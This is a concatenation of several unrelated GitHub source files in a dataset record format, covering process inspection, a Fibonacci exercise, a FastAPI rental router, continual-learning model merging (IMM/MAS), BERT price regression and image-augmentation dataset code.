os.path.exists(sts):\n f = open(sts, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n res = out.split()\n line = f.readline()\n f.close()\n return res\n\n\ndef get_network(pid):\n '''parse network'''\n if not pid:\n return\n res = {}\n if os_type == 'Linux':\n sts = '/proc/%s/stat' % pid\n # sts = '/Users/douzhenjiang/test/inpanel/test/proc_stat.txt'\n # if os_type in ('Linux', 'Darwin'):\n if os.path.exists(sts):\n f = open(sts, 'r')\n line = f.readline()\n while line:\n out = line.strip()\n res = out.split()\n line = f.readline()\n f.close()\n return res\n\n\nif __name__ == '__main__':\n # pids = get_list()\n # print(pids)\n # print('kill_process', kill_process('sshd'))\n # print('kill_pid00', kill_pids(11587))\n # print(get_pids('php'))\n print(get_status(1))\n # print(get_base(2345))\n","repo_name":"vanbac91/rumpanel","sub_path":"core/modules/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":7366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44647680050","text":"def fib(n):\n global dp\n if dp[n] == -1:\n dp[n] = fib(n - 1) + fib(n - 2)\n return dp[n]\n\n\ndef main():\n global dp\n # YOUR CODE GOES HERE\n # Please take input and print output to standard input/output (stdin/stdout)\n # E.g. 'input()/raw_input()' for input & 'print' for output\n n = int(input())\n dp = [-1] * (n + 1)\n dp[0] = 0\n dp[1] = 1\n\n fib(n)\n\n print(dp[n])\n return dp[n]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"0xStryK3R/Scaler-DSA-Revision","sub_path":"python/Day-69/CW_1.py","file_name":"CW_1.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"25413246549","text":"from typing import Any, Optional, List\nfrom fastapi import APIRouter, Body, Depends, HTTPException\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic.networks import EmailStr\nfrom app.core import crud, schemas, models\nfrom app.api_v1 import deps\n\n\nrouter = APIRouter()\n\n\n@router.get(\"/{user_id}\", response_model=Optional[schemas.C2CSchema])\nasync def get_rent_by_id(\n *,\n rent_id: int,\n current_user: models.User = Depends(deps.get_current_active_user)\n) -> Optional[models.C2C]:\n rent_by_id = await crud.c2c.get(id=rent_id)\n if not rent_by_id:\n raise HTTPException(\n status_code=404,\n detail=\"Not found\"\n )\n return rent_by_id\n\n# @router.get(\"/me\", response_model=Optional[schemas.UserSchema])\n# async def get_user_me(\n # current_user: models.User = Depends(deps.get_current_active_user)\n# ) -> Optional[models.User]:\n # return current_user\n\n@router.get(\"/\", response_model=List[schemas.C2CSchema])\nasync def get_rents(\n current_user: models.User = Depends(deps.get_current_active_user)\n) -> List[Optional[models.C2C]]:\n return await crud.c2c.get_multy()\n\n@router.post(\"/create\", response_model=schemas.C2CSchema)\nasync def create_rent(\n *,\n schema: schemas.C2CCreate,\n current_user: models.User = Depends(deps.get_current_active_user)\n) -> models.C2C:\n return await crud.c2c.create(schema=schema)\n\n# @router.post(\"/open/create\", response_model=schemas.UserSchema)\n# async def create_user_open(\n # *,\n # email: EmailStr = Body(...),\n # password: str = Body(...)\n# ) -> models.User:\n # user = await crud.user.get_by_email(email=email)\n # if user:\n # raise HTTPException(\n # status_code=400,\n # detail=\"The user with this email already exists in the system\"\n # )\n # schema = schemas.UserCreate(password=password, email=email)\n # return await crud.user.create(schema=schema)\n\n# @router.put(\"/update/{user_id}\", response_model=Optional[schemas.UserSchema])\n# async def update_user(\n # *,\n # user_id: int,\n # schema: schemas.UserUpdate,\n # current_user: models.User = Depends(deps.get_current_active_superuser)\n# ) -> Optional[models.User]:\n # update_user = await crud.user.update(id=user_id, schema=schema)\n # if not update_user:\n # raise HTTPException(\n # status_code=404,\n # detail=\"The user with this id does not exists in the system\"\n # )\n # return update_user\n\n# @router.put(\"/update/me\", response_model=Optional[schemas.UserSchema])\n# async def update_user_me(\n # *, \n # email: EmailStr = Body(None),\n # password: str = Body(None),\n # current_user: models.User = Depends(deps.get_current_active_user)\n# ) -> Optional[models.User]:\n # current_user_data = jsonable_encoder(current_user)\n # schema = schemas.UserUpdate(**current_user_data)\n # if password is not None:\n # schema.password = password\n # else:\n # schema.password = \"\"\n # if email is not None:\n # schema.email = email\n # else:\n # schema.email = current_user.email\n # return await crud.user.update(id=current_user.id, schema=schema)\n\n# @router.delete(\"/delete/{user_id}\", response_model=Optional[models.User])\n# async def delete_user(\n # *,\n # user_id: int,\n # current_user: models.User = Depends(deps.get_current_active_superuser)\n# ) -> Any:\n # del_user = await crud.user.delete(id=user_id)\n # if not del_user:\n # raise HTTPException(\n # status_code=404,\n # detail=\"The user does not exist\"\n # )\n # return del_user\n\n# @router.delete(\"/delete/me\", response_model=Optional[models.User])\n# async def delete_user_me(\n # *,\n # email: EmailStr = Body(None),\n # password: str = Body(None),\n # current_user: models.User = Depends(deps.get_current_active_user)\n# ) -> Optional[models.User]:\n # user = await crud.user.authenticate(email=email, password=password)\n # if user.id == current_user.id:\n # del_user = await crud.user.delete(id=current_user.id)\n # return del_user \n # raise HTTPException(\n # status_code=404,\n # detail=\"Incorrect email or password\"\n # )\n","repo_name":"Mememasta/inow-back","sub_path":"app/api_v1/endpoints/c2c.py","file_name":"c2c.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11203846163","text":"from copy import deepcopy\n\nfrom torch.nn import functional as F\nfrom torch.autograd import Variable\nimport shared_utils.methods as methods\n\nfrom shared_utils.ImageFolderTrainVal import *\nimport shared_utils.utils as utils\n\nimport train.MAS.MAS as MAS\n\n\ndef get_merge_weights(args, iw_user, head_param_names, models, last_task_idx, overwrite, cuda=True, eps=1e-10):\n \"\"\"\n Calculate merged IWs for all the trained models and save them to the same location.\n \"\"\"\n print(\"IMM PREPROCESSING: Mode {}, overwrite={}\".format(args.IMM_mode, overwrite))\n iw_matrices = []\n sum_iw_matrices = [] # All summed of previous tasks (first task not included)\n sum_iw_matrix = None\n args.iw_paths = []\n args.sum_iw_paths = []\n\n iw_name = args.method.get_iw_name(args.eval_ds.name, user=iw_user, task_agnostic=args.task_agnostic)\n sum_iw_name = args.method.get_iw_name(args.eval_ds.name, user=iw_user, sum=True, task_agnostic=args.task_agnostic)\n\n # Checks\n assert len(args.iw_ds_holder) == len(args.merge_target_models), \\\n \"Subsetting requires both IW dataset and model subsetting.\"\n\n for model_list_index in range(0, last_task_idx + 1):\n print(\"*** ESTIMATING IWS on MODEL of TASK {}\".format(model_list_index + 1))\n iw_out_file_path = os.path.join(os.path.dirname(args.merge_target_models[model_list_index]), iw_name)\n sum_iw_out_file_path = os.path.join(os.path.dirname(args.merge_target_models[model_list_index]), sum_iw_name)\n\n #######################################\n # Get individual model IW matrices\n if os.path.exists(iw_out_file_path) and not overwrite:\n model_iw_matrix = torch.load(iw_out_file_path)\n print('LOADED PRECISION MATRIX FOR TASK {} : {}'.format(model_list_index, iw_out_file_path))\n else:\n model = deepcopy(models[model_list_index])\n\n # When task-agnostic: iterate over all datasets for 1 model\n task_idxs = [model_list_index] if not args.task_agnostic else list(range(len(args.iw_ds_holder)))\n model_iw_matrix = None\n for task_idx in task_idxs:\n print(\"* IW: MODEL of TASK {}, on DS of TASK={}\".format(model_list_index + 1, task_idx + 1))\n\n # Init data\n if isinstance(args.iw_ds_holder[task_idx], str): # Load from path\n dsets = torch.load(args.iw_ds_holder[task_idx])\n else: # Imgfolders in memory\n dsets = args.iw_ds_holder[task_idx]\n dset_loaders = {\n x: torch.utils.data.DataLoader(dsets[x], batch_size=args.bs, shuffle=True, num_workers=8)\n for x in args.ds_subsets}\n\n # Format params\n if args.debug:\n print(\"PARAM NAMES\")\n [print(n) for n, p in model.named_parameters() if p.requires_grad]\n model.params = {n: p for n, p in model.named_parameters() if p.requires_grad}\n\n # Calculate IWS\n if isinstance(args.method, methods.IMM) and args.IMM_mode == 'mode_MAS' \\\n or isinstance(args.method, methods.LocallyAdaptive) and 'plain' in args.LA_mode:\n dset_loaders = [dset for dset in dset_loaders.values()]\n task_iw_matrix = MAS_iws(model, dset_loaders, exclude_params=head_param_names,\n normalize_mode=args.LA_mode,\n cuda=True, mode=args.method.mode)\n\n elif isinstance(args.method, methods.IMM) and args.IMM_mode == 'mode' \\\n or isinstance(args.method, methods.LocallyAdaptive) and 'FIM' in args.LA_mode:\n task_iw_matrix = diag_fisher(model, dset_loaders, exclude_params=head_param_names, cuda=True)\n else:\n raise Exception(\"NO valid method to get IWS for:{}\".format(args.method))\n\n # Checks\n assert [task_iw_matrix.keys()] == [\n {name for name, p in model.named_parameters() if name not in head_param_names}]\n if not cuda:\n task_iw_matrix = {name: p.cpu().clone() for name, p in task_iw_matrix.items()}\n\n # Sum over all task_idxs\n if model_iw_matrix is None:\n model_iw_matrix = task_iw_matrix\n else:\n model_iw_matrix = add_iws(task_iw_matrix, model_iw_matrix)\n\n # Cleanup\n del model\n dset_loaders.clear()\n torch.cuda.empty_cache()\n\n if args.store_iws:\n print(\"Saving IW matrix: \", iw_out_file_path)\n torch.save(model_iw_matrix, iw_out_file_path)\n args.iw_paths.append(iw_out_file_path)\n iw_matrices.append(model_iw_matrix)\n\n #######################################\n # Update incremental sum matrix for each model\n if sum_iw_matrix is None:\n sum_iw_matrix = model_iw_matrix\n else:\n if os.path.exists(sum_iw_out_file_path) and not overwrite:\n sum_iw_matrix = torch.load(sum_iw_out_file_path)\n print('LOADED SUM-PRECISION MATRIX FOR TASK {} : {}'.format(model_list_index, sum_iw_out_file_path))\n else:\n if args.debug:\n for name, p in sum_iw_matrix.items():\n try:\n print(\"{}: {} -> {}\".format(name, p.shape, model_iw_matrix[name].shape))\n except:\n pass\n sum_iw_matrix = add_iws(model_iw_matrix, sum_iw_matrix)\n\n # This is of key importance to avoid divison by zero\n for name, p in sum_iw_matrix.items():\n sum_iw_matrix[name][p == 0] = eps\n\n if args.store_iws:\n print(\"Saving SUM precision matrix: \", sum_iw_out_file_path)\n torch.save(sum_iw_matrix, sum_iw_out_file_path)\n args.sum_iw_paths.append(sum_iw_out_file_path)\n sum_iw_matrices.append(sum_iw_matrix)\n torch.cuda.empty_cache()\n\n return iw_matrices, sum_iw_matrices\n\n\ndef add_iws(iw_matrix, sum_iw_matrix):\n \"\"\" ADD iw_matrix to sum_iw_matrix.\"\"\"\n sum_iw_matrix = {name: p + iw_matrix[name]\n for name, p in sum_iw_matrix.items()}\n assert len([iw_matrix[name] != p for name, p in sum_iw_matrix.items()]) > 0\n\n return sum_iw_matrix\n\n\ndef merging_preprocess(args, overwrite=False, cuda=True):\n \"\"\"\n Create and save all merged models for the specified method.\n :param args.merge_target_models: list of all model paths to merge incrementally.\n :param user: user for which to calculate IWs, None means no specific user.\n :param overwrite: Overwrite if exists.\n :param cuda: Store and load all models, IWs in cuda format. Otherwise only IW calculation itself runs on GPU.\n :return: pathlist of merged models\n \"\"\"\n\n IMM_mode = args.method.mode\n use_iws = isinstance(args.method, methods.LocallyAdaptive) or \\\n isinstance(args.method, methods.IMM) and (IMM_mode == 'mode' or IMM_mode == 'mode_MAS')\n merged_model_paths = []\n last_task_idx = len(args.merge_target_models) - 1\n merge_model_name = args.method.get_merged_model_name(args.eval_ds.name, args.user)\n\n models = None\n\n # Keep first model (no merge needed)\n merged_model_paths.append(args.merge_target_models[0])\n\n # Create merged model for each task (except first)\n iws_initialized = False\n\n for task_list_index in range(1, last_task_idx + 1):\n out_file_path = os.path.join(os.path.dirname(args.merge_target_models[task_list_index]), merge_model_name)\n skip_merge = args.skip_merging or os.path.exists(out_file_path) and not overwrite\n\n # Init only when necessary\n if models is None:\n models = init_models(args, cuda)\n last_layer_index, _ = utils.get_last_neural_layer(models[0])\n head_param_names = ['classifier.{}.{}'.format(last_layer_index, name) for name, p in\n models[0].classifier._modules[last_layer_index].named_parameters()]\n if args.debug:\n print(\"HEAD PARAM NAMES\")\n [print(name) for name in head_param_names]\n\n # Mean IMM\n if IMM_mode == 'mean':\n if skip_merge:\n print(\"SKIPPED MERGING OF: {}\".format(out_file_path))\n else:\n merged_model = IMM_merge_models(models, task_list_index, head_param_names, cuda=cuda)\n\n # Mode IMM\n elif use_iws:\n if not iws_initialized:\n iw, sum_iw = get_merge_weights(args, args.iw_user, head_param_names, models, last_task_idx,\n overwrite, cuda=cuda)\n iws_initialized = True\n\n if skip_merge:\n print(\"SKIPPED MERGING OF: {}\".format(out_file_path))\n else:\n merged_model = IMM_merge_models(models, task_list_index, head_param_names,\n iw=iw, sum_iw=sum_iw[task_list_index - 1], cuda=cuda)\n else:\n raise ValueError(\"IMM mode is not supported: \", str(IMM_mode))\n\n merged_model_paths.append(out_file_path)\n torch.cuda.empty_cache()\n\n if not skip_merge:\n # Save merged model on same spot as best_model\n torch.save(merged_model, out_file_path)\n del merged_model\n print(\" => SAVED MERGED MODEL: \", out_file_path)\n\n try:\n del head_param_names, models[:]\n del iw[:], sum_iw[:]\n except:\n pass\n\n print(\"MERGED MODELS:\")\n print('\\n'.join(map(str, merged_model_paths)))\n\n return merged_model_paths\n\n\ndef init_models(args, cuda):\n models = []\n for model_path in args.merge_target_models:\n if isinstance(model_path, str):\n model = torch.load(model_path, map_location=lambda storage, loc: storage) # Load all on cpu\n else:\n model = model_path\n if cuda:\n model = model.cuda()\n else:\n model = model.cpu()\n try:\n del model.reg_params\n print(\"removed reg_params from loaded model\")\n except:\n pass\n\n models.append(model)\n torch.cuda.empty_cache()\n\n print(\"MODELS TO MERGE:\")\n print('\\n'.join(args.merge_target_models))\n print(\"LOADED \", len(models), \" MODELS in MEMORY\")\n return models\n\n\ndef diag_fisher(model, dataset, exclude_params=None, cuda=True):\n \"\"\" FIM-IMM IWs as in EWC.\"\"\"\n print(\"Calculating precision matrix\")\n if cuda:\n model = model.cuda()\n\n # initialize space for precision_matrix\n precision = {}\n for n, p in deepcopy(model.params).items():\n if n in exclude_params:\n # print(\"Skipping diag calculation for param \", n)\n continue\n p.data.zero_()\n precision[n] = Variable(p.data + 1e-8)\n\n # fill matrix\n model.eval()\n for phase in dataset.keys():\n for input in dataset[phase]:\n model.zero_grad()\n x, label = input\n x, label = Variable(x), Variable(label, requires_grad=False)\n\n if cuda:\n x = x.cuda()\n label = label.cuda()\n output = model(x) # .view(1, -1)\n temp = F.softmax(output).data\n\n targets = torch.reshape(Variable(torch.multinomial(temp, 1).clone()), (-1,))\n\n if cuda:\n targets.cuda()\n\n # label = output.max(1)[1].view(-1)\n loss = F.nll_loss(F.log_softmax(output, dim=1), targets, size_average=True)\n\n loss.backward()\n\n for n, p in model.named_parameters():\n if n in exclude_params:\n continue\n precision[n].data += p.grad.data ** 2 / len(dataset[phase])\n\n precision_param = {n: p for n, p in precision.items()}\n return precision_param\n\n\ndef MAS_iws(model, dset_loaders, norm='L2', exclude_params=None, normalize_mode=None, cuda=True, mode=None):\n \"\"\"MAS.\"\"\"\n print(\"Calculating MAS IWs.\")\n model = MAS.get_new_iws(None, None, model, None, dset_loaders=dset_loaders, norm=norm, cuda=cuda,\n mode=mode).cpu()\n iws = {name: model.reg_params[param]['omega'].clone() for name, param in model.named_parameters()\n if param in model.reg_params and name not in exclude_params}\n del model\n torch.cuda.empty_cache()\n\n if normalize_mode == 'layernorm':\n iws = {name: iw / torch.max(iw) for name, iw in iws.items()}\n print(\"LAYERWISE NORMALIZATION\")\n elif normalize_mode == 'modelnorm':\n max_iws = [torch.max(val) for val in iws.values()]\n max_iw = max(max_iws)\n print(\"MAX IW = {}\".format(max_iw))\n iws = {name: iw / max_iw for name, iw in iws.items()}\n print(\"MODELWISE NORMALIZATION\")\n elif normalize_mode == 'stdlayernorm':\n iws = {name: iw / torch.std(iw) for name, iw in iws.items()}\n print(\"STD LAYERWISE NORMALIZATION\")\n elif normalize_mode == 'stdmodelnorm':\n std_iws = [torch.std(val) for val in iws.values()]\n max_iw = max(std_iws)\n print(\"MAX STD IW = {}\".format(max_iw))\n iws = {name: iw / max_iw for name, iw in iws.items()}\n print(\"STD MODELWISE NORMALIZATION\")\n\n return iws\n\n\ndef IMM_merge_models(models, task_list_idx, head_param_names, iw=None, sum_iw=None, cuda=True):\n \"\"\"\n Mean-IMM, averaging all the parameters of the trained models up to the given task.\n Mode-IMM, see paper: using preciison and sum_precision\n\n Here alphas are all equal (1/ #models). All alphas must sum to 1.\n\n :param models: list with all models preceding and current model of param task\n :param task_list_idx: up to and including which task the models should be merged\n :return: new merged model, as we don't want to update the models param ()\n \"\"\"\n mean_mode = iw is None and sum_iw is None\n\n print(\"MERGE MODE=[MEAN={}, IW={}] Merging models for TASK {}\"\n .format(mean_mode, not mean_mode, str(task_list_idx + 1)))\n merged_model = deepcopy(models[task_list_idx])\n\n total_task_count = task_list_idx + 1 # e.g. task_idx 1, means to avg over task_idx 0 and 1 => 2 tasks\n\n # Iterate params\n for param_name, param_value in merged_model.named_parameters():\n # Don't merge heads (we use separate heads)\n if param_name in head_param_names:\n print(\"NOT MERGING PARAM {}, as it is a head param name\".format(param_name))\n continue\n\n # Calculate Mean\n mean_param = torch.zeros(param_value.data.size())\n if cuda:\n mean_param = mean_param.cuda()\n for merge_task_idx in range(0, total_task_count): # Avg over all preceding + including current task\n\n # Error check\n if models[merge_task_idx].state_dict()[param_name].size() != mean_param.size():\n print(\"ERROR WHEN MERGING MODELS\")\n raise Exception(\"ERROR WHEN MERGING MODELS: PRECEDING MODEL PARAMS TASK\",\n str(merge_task_idx), \" != PARAM SIZE OF REF TASK\", str(task_list_idx))\n\n if mean_mode: # MEAN IMM\n state_dict = models[merge_task_idx].state_dict()\n param_value = state_dict[param_name]\n mean_param = mean_param + param_value\n else: # MODE IMM\n merge_weighting = iw[merge_task_idx][param_name] / sum_iw[param_name]\n d_mean_param = merge_weighting.data * models[merge_task_idx].state_dict()[param_name]\n mean_param += d_mean_param\n assert torch.all(torch.eq(torch.sum(merge_weighting.gt(1)), 0)), \\\n print(\"MERGE VALUE > 1: {}\".format(merge_weighting[torch.nonzero(merge_weighting.gt(1))]))\n assert not torch.any(torch.isnan(merge_weighting))\n\n # Task_idx is count of how many iterated\n if mean_mode:\n mean_param = mean_param / total_task_count # Cancels out in mode IMM\n # Update this avged param\n param_value.data = mean_param.clone()\n\n return merged_model\n","repo_name":"Mattdl/DUA","sub_path":"train/IMM/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":16364,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"60"} +{"seq_id":"15635363014","text":"import numpy as np\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom transformers import AutoModelForSequenceClassification\nfrom transformers import AutoTokenizer\nfrom transformers import DataCollatorWithPadding\nfrom transformers import Trainer\nfrom transformers import TrainingArguments\n\nBASE_MODEL = 'bert-base-cased'\nLEARNING_RATE = 1e-1\nMAX_LENGTH = 512 # change this\nBATCH_SIZE = 40\nEPOCHS = 20\n\ntokenizer = AutoTokenizer.from_pretrained(BASE_MODEL)\nmodel = AutoModelForSequenceClassification.from_pretrained(BASE_MODEL,\n num_labels=1)\n\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\n\n\ndef compute_metrics_for_regression(eval_pred):\n logits, labels = eval_pred\n labels = labels.reshape(-1, 1)\n\n mse = mean_squared_error(labels, logits)\n mae = mean_absolute_error(labels, logits)\n r2 = r2_score(labels, logits)\n single_squared_errors = ((logits - labels).flatten()**2).tolist()\n\n # Compute accuracy\n # Based on the fact that the rounded score = true score only if |single_squared_errors| < 0.5\n accuracy = sum([1 for e in single_squared_errors if e < 0.25\n ]) / len(single_squared_errors)\n\n return {'mse': mse, 'mae': mae, 'r2': r2, 'accuracy': accuracy}\n\n\ntraining_args = TrainingArguments(\n output_dir='../models/camembert-fine-tuned-regression-2',\n learning_rate=LEARNING_RATE,\n per_device_train_batch_size=BATCH_SIZE,\n per_device_eval_batch_size=BATCH_SIZE,\n num_train_epochs=EPOCHS,\n evaluation_strategy='epoch',\n save_strategy='epoch',\n save_total_limit=2,\n metric_for_best_model='accuracy',\n load_best_model_at_end=True,\n weight_decay=0.01,\n)\n\n\ndef preprocess_function(data):\n label = float(data['price'])\n label = np.log(label)\n input_text = data['features']\n output = tokenizer(input_text,\n truncation=True,\n padding='max_length',\n max_length=256)\n output['label'] = label\n return output\n\n\nif __name__ == '__main__':\n y_train_raw = pd.read_csv('data/tabular/y_train_OXxrJt1.csv')\n full_df = pd.read_csv('data/image_captions/df.csv')\n full_df['price'] = y_train_raw['price']\n\n train, test = train_test_split(full_df, test_size=0.2)\n\n train = train[:3000]\n test = test[:300]\n ds = {'train': train, 'validation': test}\n\n for split in ds:\n ds[split] = ds[split].apply(lambda row: preprocess_function(row),\n axis=1)\n ds[split].reset_index(inplace=True, drop=True)\n\n class RegressionTrainer(Trainer):\n \"\"\"\n Hana ajoutito\n \"\"\"\n def compute_loss(self, model, inputs, return_outputs=False):\n labels = inputs.pop('labels')\n outputs = model(**inputs)\n logits = outputs[0][:, 0]\n loss = torch.nn.functional.mse_loss(logits, labels)\n return (loss, outputs) if return_outputs else loss\n\n trainer = RegressionTrainer(\n model=model,\n args=training_args,\n train_dataset=ds['train'],\n eval_dataset=ds['validation'],\n compute_metrics=compute_metrics_for_regression,\n )\n\n trainer.train()\n # ! This part is dangerous keep attention\n # TODO : clean the code and safi\n #* This highlit\n # normal comment\n # linters\n","repo_name":"Abdellah-Laassairi/real-estate-price-prediction","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"23856748052","text":"import os\nimport cv2\nimport torch\nimport matplotlib\nimport numpy as np\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom utils.basic_utils import rand_range\n\n\nclass DatasetBase:\n def __init__(self, config, dataset_mode, multi_view, set_views, syn_train_data_ratio=0.0):\n self.config = config\n self.dataset_mode = dataset_mode\n self.multi_view = multi_view\n self.set_views = set_views\n\n self.dataset_mode = dataset_mode\n self.xmap = np.array([[j for _ in range(640)] for j in range(480)], dtype=np.int32)\n self.ymap = np.array([[i for i in range(640)] for _ in range(480)], dtype=np.int32)\n\n self.trancolor = transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.05)\n self.norm = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.224])\n self.syn_train_data_ratio = syn_train_data_ratio # ratio of synthetic data in addition to real data for multi-view training\n\n if self.dataset_mode != 'train':\n self.add_noise = False\n self.add_depth_noise = False\n self.add_color_jitter = False\n\n def real_syn_gen(self):\n if not self.syn_train_data_ratio or self.rng.rand() > self.syn_train_data_ratio:\n item = self.real_gen()\n else:\n n = len(self.syn_lst)\n idx = self.rng.randint(0, n)\n item = self.syn_lst[idx]\n return item\n\n def real_gen(self):\n n = len(self.real_lst)\n idx = self.rng.randint(0, n)\n item = self.real_lst[idx]\n return item\n\n def gaussian_noise(self, rng, img, sigma):\n \"\"\"\n add Gaussian noise of given sigma to image independently for each pixel\n :param rng: random generator\n :param img: image as numpy array e.g. (480, 640, 3)\n :param sigma: ing e.g. 4\n :return: image as numpy array e.g. (480, 640, 3)\n \"\"\"\n \"\"\"add gaussian noise of given sigma to image\"\"\"\n img = img + rng.randn(*img.shape) * sigma\n img = np.clip(img, 0, 255).astype('uint8')\n return img\n\n def linear_motion_blur(self, img, angle, length):\n \"\"\"\n :param img: image as numpy array e.g. (480, 640, 3)\n :param angle: in degree, integer e.g. 84\n :param length: integer\n :return: image as numpy array e.g. (480, 640, 3)\n \"\"\"\n rad = np.deg2rad(angle)\n dx = np.cos(rad)\n dy = np.sin(rad)\n a = int(max(list(map(abs, (dx, dy)))) * length * 2)\n if a <= 0:\n return img\n kern = np.zeros((a, a))\n cx, cy = a // 2, a // 2\n dx, dy = list(map(int, (dx * length + cx, dy * length + cy)))\n cv2.line(kern, (cx, cy), (dx, dy), 1.0)\n s = kern.sum()\n if s == 0:\n kern[cx, cy] = 1.0\n else:\n kern /= s\n return cv2.filter2D(img, -1, kern)\n\n def rgb_add_noise(self, img, name=None):\n \"\"\"\n Add different types of noise to an RGB image, e.g. additive Gaussian noise, motion blur, sharpening, etc.\n :param img:\n :param name: file_name for debugging only\n :return:\n \"\"\"\n rng = self.rng\n\n # apply HSV augmentor\n if rng.rand() <= self.config.rgb_hsv_augment:\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV).astype(np.uint16)\n hsv_img[:, :, 1] = hsv_img[:, :, 1] * rand_range(rng, 1.25, 1.45)\n hsv_img[:, :, 2] = hsv_img[:, :, 2] * rand_range(rng, 1.15, 1.35)\n hsv_img[:, :, 1] = np.clip(hsv_img[:, :, 1], 0, 255)\n hsv_img[:, :, 2] = np.clip(hsv_img[:, :, 2], 0, 255)\n img = cv2.cvtColor(hsv_img.astype(np.uint8), cv2.COLOR_HSV2BGR)\n\n if rng.rand() <= self.config.rgb_sharpen_ratio: # sharpen\n kernel = -np.ones((3, 3))\n kernel[1, 1] = rng.rand() * 3 + 9\n kernel /= kernel.sum()\n img = cv2.filter2D(img, -1, kernel)\n\n if rng.rand() <= self.config.rgb_motion_blur_ratio: # motion blur\n r_angle = int(rng.rand() * 360)\n r_len = int(rng.rand() * 15) + 1\n img = self.linear_motion_blur(img, r_angle, r_len)\n\n if rng.rand() <= self.config.rgb_gaussian_blur_ratio:\n if rng.rand() <= self.config.rgb_gaussian_blur_small_ratio:\n img = cv2.GaussianBlur(img, (3, 3), rng.rand())\n else:\n img = cv2.GaussianBlur(img, (5, 5), rng.rand())\n\n # add Gaussian noise of fixed sigma [0, 15/25) to image independently for each pixel\n if rng.rand() <= self.config.rgb_gaussian_noise_small_ratio:\n img = self.gaussian_noise(rng, img, sigma=rng.randint(15))\n else:\n img = self.gaussian_noise(rng, img, sigma=rng.randint(25))\n\n if rng.rand() <= self.config.rgb_normal_noise_ratio:\n # add Gaussian noise of sigma=7 to image independently for each pixel\n img = img + np.random.normal(loc=0.0, scale=7.0, size=img.shape)\n\n return np.clip(img, 0, 255).astype(np.uint8)\n\n def depth_img_add_noise(self, img, name=None):\n \"\"\"\n Add different types of noise to a depth image, e.g. additive Gaussian noise\n :param img: NumPy, depth image e.g. (480, 640)\n :param name: file_name for debugging only\n :return:\n \"\"\"\n rng = self.rng\n\n if rng.rand() <= self.config.depth_normal_noise_ratio:\n # add Gaussian noise of sigma=7 to image independently for each pixel\n img += np.random.normal(loc=0.0, scale=self.config.depth_normal_noise_scale, size=img.shape).astype(np.float32)\n\n return np.clip(img, 0, 1)\n\n def add_real_back(self, rgb, labels, dpt, dpt_msk):\n \"\"\"\n # Loads a real image, removes all objects and places the objects of the synthetic input image in front of the real background\n # :param rgb: synthetic RGB image, uint8 (480, 640, 3)\n # :param labels: corresponding semantic segmentation label, uint8 (480, 640)\n # :param dpt: corresponding depth image, int32 (480, 640)\n # :param dpt_msk: corresponding depth mask, bool (480, 640) -> indicates where dpt has values > 1e-6 # TODO: Why are they useful?\n # :return: rgb (480, 640, 3), dpt float64 (480, 640)\n # \"\"\"\n real_item = self.real_gen()\n with Image.open(os.path.join(self.root, real_item+'-depth.png')) as di:\n real_dpt = np.array(di)\n with Image.open(os.path.join(self.root, real_item+'-label.png')) as li:\n bk_label = np.array(li)\n bk_label = (bk_label <= 0).astype(rgb.dtype)\n bk_label_3c = np.repeat(bk_label[:, :, None], 3, 2)\n with Image.open(os.path.join(self.root, real_item + '-color.png')) as ri:\n back = np.array(ri)[:, :, :3] * bk_label_3c\n dpt_back = real_dpt.astype(np.float32) * bk_label.astype(np.float32)\n\n msk_back = (labels <= 0).astype(rgb.dtype)\n msk_back = np.repeat(msk_back[:, :, None], 3, 2)\n rgb = rgb * (msk_back == 0).astype(rgb.dtype) + back * msk_back\n\n dpt = dpt * (dpt_msk > 0).astype(dpt.dtype) + \\\n dpt_back * (dpt_msk <= 0).astype(dpt.dtype)\n return rgb, dpt\n\n def dpt_2_pcld(self, dpt, cam_scale, K):\n \"\"\"\n converts a depth image into a depth_xyz map where at each pixel the corresponding 3d location is stored!?\n :param dpt: depth image numpy array (h, w) e.g. (480, 640)\n :param cam_scale: scalar e.g. 1 or 10000\n :param K: camera intrinsic matrix, numpy array (3, 3)\n :return: depth_xyz map\n \"\"\"\n if len(dpt.shape) > 2:\n dpt = dpt[:, :, 0]\n dpt = dpt.astype(np.float32) / cam_scale\n msk = (dpt > 1e-8).astype(np.float32)\n row = (self.ymap - K[0][2]) * dpt / K[0][0]\n col = (self.xmap - K[1][2]) * dpt / K[1][1]\n dpt_3d = np.concatenate(\n (row[..., None], col[..., None], dpt[..., None]), axis=2\n )\n dpt_3d = dpt_3d * msk[:, :, None]\n return dpt_3d\n\n def __len__(self):\n if self.multi_view:\n try:\n return len(self.sequence_samples)\n except AttributeError:\n return len(self.pp_data)\n return len(self.all_lst)\n\n def get_sequence(self, sequence_ids):\n sequence = []\n for sequence_id in sequence_ids:\n sequence.append(self.get_item(sequence_id))\n return sequence\n\n def transform_offsets(self, camchange, origin, transformed_origin, offset):\n offset_points = origin + offset\n new_offset_points = self.transform_data(camchange, offset_points)\n new_offsets = new_offset_points - transformed_origin\n return new_offsets\n","repo_name":"boschresearch/SyMFM6D","sub_path":"datasets/dataset_base_class.py","file_name":"dataset_base_class.py","file_ext":"py","file_size_in_byte":8806,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"43113115747","text":"a, b, c = input().split()\n\na = 